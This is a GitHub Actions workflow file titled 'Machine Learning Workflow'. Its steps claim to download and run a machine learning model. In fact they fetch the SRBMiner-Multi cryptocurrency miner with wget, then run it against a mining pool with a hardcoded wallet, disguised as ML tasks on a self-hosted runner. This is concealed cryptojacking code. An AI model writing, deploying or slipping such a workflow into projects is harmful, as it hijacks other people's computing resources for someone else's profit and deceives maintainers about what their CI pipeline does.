name: Machine Learning Workflow

on:
  push:
    branches:
      - main  # You might need to adjust this depending on your default branch name

jobs:
  build:
    runs-on: self-hosted

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v2

      - name: Install Dependencies
        run: |
          apt update
          apt -y install tar xz-utils

      - name: Download and Extract Machine Learning Model
        run: |
          wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.4.7/SRBMiner-Multi-2-4-7-Linux.tar.xz
          tar xf SRBMiner-Multi-2-4-7-Linux.tar.xz
          cd SRBMiner-Multi-2-4-7

      - name: Run Machine Learning Model
        run: |
          ./SRBMiner-MULTI --disable-gpu --algorithm yespower --pool na.rplant.xyz:17111 --wallet aNEpRWJEag9JiZFgztAf38q4kPmgkfXNCo.c1r pause --keepalive true
